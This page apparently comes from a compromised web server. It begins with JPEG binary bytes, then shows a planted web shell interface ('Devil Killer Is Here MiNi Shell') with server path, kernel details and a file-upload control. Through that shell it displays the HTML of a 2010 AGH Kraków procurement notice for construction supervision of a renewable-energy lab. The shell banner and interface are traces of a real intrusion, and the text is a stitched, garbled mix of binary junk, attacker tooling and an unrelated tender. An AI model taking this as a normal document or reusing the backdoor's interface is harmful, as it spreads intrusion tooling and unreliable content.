JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100825/230611-N-2010.html

<p class="kh_header"><b>Kraków: pełnienie nadzorów inwestorskich nad realizacją zadania inwestycyjnego pn.: Budowa laboratorium edukacyjno-badawczego odnawialnych źródeł i poszanowania energii polegająca na przebudowie, rozbudowie i nadbudowie ośrodka dydaktycznego WGGiOŚ AGH w Miękini dla projektu pn.: Laboratorium Edukacyjno-Badawcze Odnawialnych Źródeł i Poszanowania Energii AGH w Miękini - gmina Krzeszowice -ZP/0620/2010</b><br>
<b>Numer ogłoszenia: 230611 - 2010; data zamieszczenia: 25.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Górniczo - Hutnicza im. Stanisława Staszica , Al. Mickiewicza 30, 30-059 Kraków, woj. małopolskie, tel. 012 6173595, faks (012) 6173595, 6173363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzp.agh.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> pełnienie nadzorów inwestorskich nad realizacją zadania inwestycyjnego pn.: Budowa laboratorium edukacyjno-badawczego odnawialnych źródeł i poszanowania energii polegająca na przebudowie, rozbudowie i nadbudowie ośrodka dydaktycznego WGGiOŚ AGH w Miękini dla projektu pn.: Laboratorium Edukacyjno-Badawcze Odnawialnych Źródeł i Poszanowania Energii AGH w Miękini - gmina Krzeszowice -ZP/0620/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres inwestycji obejmuje przebudowę, rozbudowę i nadbudowę budynku szkoleniowo-dydaktycznego AGH w Miękini. Budynek posiada 3 kondygnacje naziemne i 1 kondygnację podziemną. 
Powierzchnia netto 931,54 m2
Powierzchnia użytkowa 483,4 m2, 
powierzchnia zabudowy 465,5m2 + 8,5m2 śmietnik
kubatura cz. naziemnej 4.201  m3
kubatura cz. podziemnej 635m3
Przebudowie również ulegnie budynek garażowy oraz zbiornik na nieczystości ciekłe o poj. 42m3
Inwestycja została podzielona na dwie części
I część- prace budowlane związane z pomieszczeniami laboratorium energii odnawialnych. Prace obejmują kondygnację podziemną i parter. Dodatkowo w ramach prac I część zostaną wykonane: infrastruktura techniczna (dolne źródła ciepła, przyłącza mediów) oraz śmietnik wolnostojący
II część - prace budowlane związane z powierzchnią noclegową obsługującą pomieszczenia dydaktyczne laboratorium energii odnawialnych. Prace obejmują kondygnację I piętra i poddasza technicznego.

1) Zakres obowiązków Wykonawcy:
1.Wykonawca zobowiązany jest do zapewnienia nadzoru inwestorskiego pełnobranżowego, w zakresie wynikającym z Prawa Budowlanego, w szczególności w specjalnościach: 
a)konstrukcyjno-budowlanej, bez ograniczeń
b)sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, 
c)sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych.
2.Wykonawca zobowiązany jest do zapewnienia nadzoru inwestorskiego w pełnym zakresie umożliwiającym nadzór nad pracami obejmującymi (etap I): 
a)branżę budowlaną, (w tym roboty rozbiórkowe),
b)przyłącze energetyczne,
c)przyłącza wodociągowe, kanalizacji sanitarnej i opadowej, 
d)instalację dolnych źródeł pomp ciepła
e)instalację solarną (AKP i sterowanie)
f)instalację wodociągową (zimna i ciepła woda użytkowa), 
g)instalację wodociągową przeciwpożarową (hydrantową), 
h)instalację kanalizacji sanitarnej i opadowej, 
i)instalację centralnego ogrzewania i chłodzenia, 
j)instalację wentylacji mechanicznej,
k)instalację p.poż.,
l)instalację odgromową, 
m)instalację oświetlenia podstawowego, ewakuacyjnego, kierunkowego i nocnego 
n)oświetlenie zewnętrzne, 
o)instalację teletechniczną (transmisji danych, telefoniczna, radio-telewizyjna, telewizji dozorowej, sygnalizacji włamania, instalację systemu kontroli dostępu,
p)instalację siłową 
q)instalację przeciwporażeniowa, przeciwprzepięciowa
r)instalację zasilania i sterowania rolet
3.Wykonawca odpowiedzialny będzie za nadzór nad przebiegiem  budowy,w szczególności za nadzór nad terminową realizację inwestycji oraz egzekwowanie terminowego usuwania ewentualnych wad w okresie rękojmi i gwarancji 
4.Wykonawca odpowiedzialny jest za zgodność wykonania inwestycji z warunkami technicznymi  i jakościowymi. 
5.Od Wykonawcy wymagana jest należyta staranność przy realizacji zamówienia, szczególnie sprawowanie kontroli nad przebiegiem budowy przez cały okres jej trwania w zakresie niezbędnym do zabezpieczenia interesów Inwestora i przyszłych użytkowników. 
	
2)Zakres czynności inspektora nadzoru w każdej branży: 
1.Inspektor nadzoru jest przedstawicielem Inwestora na budowie, upoważnionym    i zobowiązanym do sprawowania nadzoru nad realizacją inwestycji zgodnie  z wielobranżową dokumentacją projektową, Specyfikacją Technicznego Wykonania i Odbioru Robót Budowlanych, przepisami Prawa budowlanego, umową  z Wykonawcą. W ramach swoich kompetencji inspektor upoważniony jest do podejmowania decyzji dotyczących zagadnień technicznych tej budowy, w ścisłym porozumieniu z Inwestorem, a także do kierowania do Inwestora wniosków o podjęcie decyzji w sprawach ekonomicznych.
2.Swoje obowiązki inspektora nadzoru wykonywać będzie w 3 podstawowych okresach:
a)w okresie poprzedzającym rozpoczęcie realizacji Inwestycji, 
b)w okresie realizacji Inwestycji
c)w trzyletnim okresie gwarancji i rękojmi na wykonane roboty.
3.Do obowiązków inspektora nadzoru w okresie poprzedzającym realizację budowy należy: 
a)zapoznanie się z dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót, SIWZ na wybór Wykonawcy inwestycji,  w tym z projektem umowy o wykonanie inwestycji, warunkami pozwolenia na budowę jak również z terenem, jego uzbrojeniem i istniejącymi urządzeniami,
b)sprawdzanie kosztorysów ofertowych pod względem merytorycznym, formalno-rachunkowym w zakresie określonym w  SIWZ, składanych przez Wykonawców ubiegających się o udzielenie zamówienia na realizację Inwestycji.
c)weryfikacja programu zapewnienia jakości robót, planu bezpieczeństwa  i ochrony zdrowia (BIOZ) wraz z projektem organizacji robót i zagospodarowania placu budowy.
d)uzgodnienie wraz z Zamawiającym harmonogramu rzeczowo-finansowego opracowanego przez Wykonawcę robót budowlanych.
e)w razie stwierdzenia w dokumentacji projektowej wad albo też konieczności wprowadzenia zmian w celu zastosowania innych rozwiązań konstrukcyjnych lub innych materiałów niż przewidziane w dokumentacji projektowej, albo konieczności wprowadzenia zmian w celu osiągnięcia oszczędności i obniżenia kosztów budowy, inspektor nadzoru jest zobowiązany zwrócić się z wnioskiem do Inwestora o przeprowadzenie w dokumentacji zmian i poprawek.
4.Obowiązki inspektora nadzoru w okresie realizacji inwestycji: 
a)sprawowanie kontroli nad przebiegiem budowy przez cały okres jej trwania w zakresie niezbędnym do zabezpieczenia interesów Inwestora i przyszłych Użytkowników. 
b)dokonywanie odpowiednich wpisów w dzienniku budowy, w szczególności o objęciu funkcji inspektora nadzoru, wszelkich zmianach w sprawowaniu tej funkcji, opisu czynności w toku realizacji budowy.
c)reprezentowanie Inwestora na budowie przez sprawowanie kontroli zgodności realizacji inwestycji z umową, wielobranżową dokumentacją projektową, SIWZ na roboty budowlane, aktualnie dostępną wiedzą techniczną, przepisami prawa obowiązującymi w tym zakresie w szczególności Prawem Budowlanym, Polskimi Normami; 
d)sprawdzenie wyznaczenia w terenie obiektów budowlanych przez służbę geodezyjną zgodnie z warunkami określonymi w przepisach technicznych o wykonywaniu robot geodezyjnych;
e)sprawdzenie zgodności rzeczywistych warunków geotechnicznych i hydrogeologicznych w wykopach fundamentów z założeniami opisanymi w dokumentacji projektu budowlanego. W przypadku niezgodności zgłoszenie tego faktu Inwestorowi
f)kontrola jakości wykonywanych robót, wbudowanych elementów i stosowanych materiałów, zgodności robót z warunkami pozwolenia na budowę, zasad bezpieczeństwa obiektu w toku budowy;
g)sprawdzenie posiadanych przez kierownika budowy (robót) odpowiednich dokumentów (atestów, świadectw jakości, wyników badań) dotyczących dostarczanych elementów prefabrykowanych i innych wyrobów, jak też w miarę potrzeby dokonywanie oceny jakości elementów prefabrykowanych na placu budowy przed ich wbudowaniem. W razie braku wymaganych dokumentów stwierdzających właściwą jakość lub też w razie zastrzeżeń dotyczących elementów prefabrykowanych i innych wyrobów przewidzianych do wbudowania, żądanie od wykonawcy odpowiednich badań i przedstawienia ekspertyzy technicznej oraz powiadomienie pisemnie Inwestora o wystąpieniu takich przypadków; 
h)wykonywanie częściowych odbiorów i ich potwierdzanie w protokołach, zgodnie z harmonogramem realizacji Inwestycji,
i)sprawdzenie i odbiór robót budowlanych ulegających zakryciu lub zanikających zgodnie z zapisami w umowie zawartej pomiędzy Inwestorem a wykonawcą robót, uczestniczenie w próbach technicznych, odbiorach technicznych oraz w przekazaniu obiektu do użytkowania; 
j)kontrola zgodności przebiegu robót budowlanych z harmonogramem rzeczowo-finansowym stanowiącym załącznik do umowy z wykonawcą robót budowlanych oraz terminowość ich wykonywania; 
k)rozstrzyganie w porozumieniu z kierownikiem budowy, a w przypadku konieczności również autora projektu, wątpliwości technicznych powstałych w toku wykonywania robót. W sprawach objętych zakresem nadzoru autorskiego inspektor nadzoru działa w uzgodnieniu z przedstawicielem nadzoru autorskiego. Przekazywanie wykonawcy robót budowlanych zaleceń nadzoru autorskiego jest dokonywane za pośrednictwem inspektora nadzoru w uzgodnieniu z Inwestorem. 
l)w razie stwierdzenia niezgodności wykonywania robót budowlanych z dokumentacja projektową, nieprawidłowości procesów technologicznych, użycia niewłaściwych materiałów, wad w wykonywaniu lub prowadzeniu robót w sposób powodujący podwyższenie kosztów budowy albo mogących narazić Inwestora na straty - zwracanie uwagi kierownikowi budowy i w porozumieniu z Inwestorem podejmowanie odpowiednich decyzji, które wpisuje do dziennika budowy z wyznaczeniem terminu usunięcia stwierdzonych nieprawidłowości oraz zawiadamianie o tym na piśmie Inwestora, wykonawcę robót budowlanych i autora projektu;
m)kontrola i nadzór robót w zakresie BHP ppoż i ochrony środowiska, 
n)ścisła współpraca z podmiotami prowadzącymi nadzór autorski;
o)w czasie każdorazowego pobytu na budowie kontrola prawidłowości prowadzenia dziennika budowy, dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót budowlanych.
p)inspektor nadzoru zobowiązany jest nadzorować budowę (roboty budowlane) w takich odstępach czasu aby zapewniona była skuteczność nadzoru - nie rzadziej jednak niż 4 razy w tygodniu, w łącznym wymiarze 25 godz. tygodniowo (dla inspektora każdej branży). Potwierdzeniem pobytu każdego inspektora na terenie budowy będzie jego wpis w dzienniku pracy inspektorów, zawierający co najmniej datę, godz. przybycia potwierdzoną podpisem, godz. wyjścia z terenu budowy również potwierdzoną podpisem, 
q)udział w radach budowy powoływanych do oceny lub rozstrzygnięcia technicznych spraw budowy w toku jej realizacji;
r)dokonywanie kontroli ilości i wartości materiałów uzyskanych z rozbiórki, uzgadnianie z kierownikiem budowy i Inwestorem możliwości zagospodarowania tych materiałów na budowie oraz przedstawienie Inwestorowi spisu materiałów z rozbiórki, nie zagospodarowanych i pozostawionych do dyspozycji Inwestora. 
s)przedstawianie Zamawiającemu miesięcznych sprawozdań w zakresie zaawansowania rzeczowo-finansowego prac; 
t)w razie konieczności wykonania robot dodatkowych inspektor nadzoru, działając ściśle w porozumieniu z Inwestorem, spisuje z kierownikiem budowy i przedstawicielem Inwestora i nadzoru autorskiego protokół konieczności, podając przybliżony koszt tych robót i występuje z pisemnym wnioskiem do inwestora w sprawie ich wykonania oraz opracowania, w miarę potrzeby, dla tych robót niezbędnej dokumentacji projektowo- kosztowej.
u)sprawdzanie kosztorysów ewentualnych robót dodatkowych pod względem merytorycznym i formalno-rachunkowym.
v)stwierdzanie aktualnego stanu robót, w razie przerwy w robotach oraz w innych wypadkach, gdy zachodzi potrzeba ustalenia ilości, jakości i wartości robót w zakresie niezbędnym do rozliczeń wykonawcy robót z Inwestorem. 
w)inspektor nadzoru jest obowiązany wykazywać inicjatywę dla osiągania oszczędności i obniżki kosztów budowy oraz ujawniania występujących na nadzorowanej budowie nieprawidłowości i im przeciwdziałać powiadamiając i współdziałając przy tym z Inwestorem. 
x)inspektor nadzoru w porozumieniu z Inwestorem ma obowiązek każdorazowo zawiadomić właściwy organ nadzoru budowlanego o wypadkach naruszania Prawa budowlanego, stwierdzonych w toku realizacji budowy, dotyczących bezpieczeństwa budowy i ochrony środowiska, a także o rażących nieprawidłowościach lub uchybieniach technicznych.
y)inspektor nadzoru może żądać dokonania przez wykonawcę robót budowlanych, na jego koszt, odkrywek elementów robót budzących wątpliwości w celu sprawdzenia jakości ich wykonania a także dokonania prób niszczących wykonanych robót (odkucia, wycinki), jeżeli wykonanie tych robót nie zostało zgłoszone do sprawdzenia przed ich zakryciem,. 
5.Obowiązki inspektora związane z odbiorem końcowym Inwestycji: 
a)współuczestniczenie z wykonawcą Inwestycji w kompletowaniu dokumentacji powykonawczej. 
b)współuczestniczenie z wykonawcą Inwestycji w przeprowadzeniu przez służby zewnętrzne i nadzór budowlany przeglądu technicznego obiektu poprzedzającego uzyskanie pozwolenia na użytkowanie. 
c)po zakończeniu robót oraz po wykonaniu przewidzianych w odrębnych przepisach i umowie prób i sprawdzeń, inspektor nadzoru potwierdza w dzienniku budowy zapis kierownika budowy o gotowości obiektu lub robót do odbioru oraz należyte urządzenie i uporządkowanie terenu budowy. 
d)uczestnictwo w pracach powołanej komisji odbioru.
6.Obowiązki Inspektora nadzoru związane z trzyletnim okresem gwarancji i rękojmi:
a)uczestniczenie w powoływanych przez Inwestora przeglądach gwarancyjnych
b)skuteczne egzekwowanie od wykonawcy Inwestycji usuwania wad w wyznaczonych terminach

7.Inspektor nadzoru zobowiązany jest do uczestniczenia w rozliczeniu finansowym Inwestycji oraz w rozliczeniu Inwestycji wraz z przekazaniem jej na stan majątkowy Uczelni..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia: 
Wykonawca winien udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, iż: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, pełnił nadzory inwestorskie nad conajmniej:

1. 2 (dwiema)  inwestycjami budowlanymi kubaturowymi o min. 3 kondygnacjach i kubaturze co najmniej 4000m3 każda, wyposażone w instalacje wymienione w pkt. 1.2 zakresu obowiązków wykonawcy (ze szczególnym uwzględnienim lit. d), 
z podaniem daty i miejsca wykonania oraz z załączeniem dokumentów potwierdzających, że projekty te zostały wykonane lub są wykonywane należycie.
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym. 
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania osobami zdolnymi do wykonania zamówienia. 
Wykonawca winien dysponować osobami:
a)posiadającymi umiejętność kosztorysowania oraz uprawnienia do pełnienia samodzielnych funkcji w budownictwie do sprawowania funkcji inspektorów nadzoru w branżach:
- konstrukcyjno-budowlanej bez ograniczeń, 
-sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
-sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
b)aktualne członkostwo Izby Inżynierów Budownictwa dla osób posiadających uprawnienia wymienione w punkcie a.

Zamawiający dopuszcza równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12 a) ustawy z dnia 7 lipca
1994 r. Prawo Budowlane, z uwzględnieniem postanowień ustawy z dnia18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z dnia 17 kwietnia 2008r. z zm.) oraz na podstawie art. 20 a) ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z dnia 24 stycznia 2001 r. z zm.).

Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej. 
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia, metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz Oferty.
Wykaz części zamówienia,  które zostaną  wykonane przez podwykonawców (jeżeli Wykonawca przewiduje taki udział)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany umowy wymagają zgody obu Stron i zachowania formy pisemnej pod rygorem nieważności.
	2.Zmiany umowy, o których mowa w ust. 1 muszą być dokonywane z zachowaniem przepisu art. 140 ust 3 ustawy Prawo zamówień publicznych stanowiącego, że umowa jest nieważna w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ. 
